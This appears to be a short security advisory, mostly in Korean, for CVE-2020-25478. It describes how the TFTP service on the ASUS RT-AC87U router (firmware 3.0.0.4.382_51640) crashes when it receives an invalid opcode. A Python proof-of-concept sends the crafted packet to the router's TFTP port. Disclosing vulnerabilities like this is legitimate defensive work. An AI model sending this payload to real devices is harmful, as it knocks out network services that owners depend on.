
ASUS RT-AC87U TFTP is vulnerable to Denial of Service(DoS) attack
CVE-2020-25478 - ASUS RT-AC87U TFTP는 서비스 거부(DoS) 공격에 취약합니다
ASUS RT-AC87U 3.0.0.4.382_51640
주로 CWE-20과 관련이 있으며, ASUS RT-AC87U에서 실행되는 TFTP 서비스는 잘못된 opcode가 전송될 때 서비스 거부(DoS) 공격에 취약합니다. 다음 파이썬 코드 스니펫은 취약점 테스트에 사용됩니다:
import socket
import sys
tftpd = ('192.168.1.1', 69)
#Try and open an UDP SOCKET
try:
tftp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
print("Failed on socket creation, so exiting")
sys.exit(1)
#create a invalid opcode exeeding the 2 byte length
# opcode operation
# 1 Read request (RRQ)
# 2 Write request (WRQ)
# 3 Data (DATA)
# 4 Acknowledgment (ACK)
# 5 Error (ERROR)
invalidOpcode = "0000"
tftp.sendto(invalidOpcode,tftpd)
3. 설명
ASUS RT-AC87U 버전 3.0.0.4.382_51640은 TFTP 서비스에 대한 서비스 거부 공격에 취약하여 TFTP 서비스가 중단됩니다. TFTP 서비스는 잘못된 opcode를 전송하여 원격으로 중단될 수 있습니다.
https://www.asus.com/content/ASUS-Product-Security-Advisory/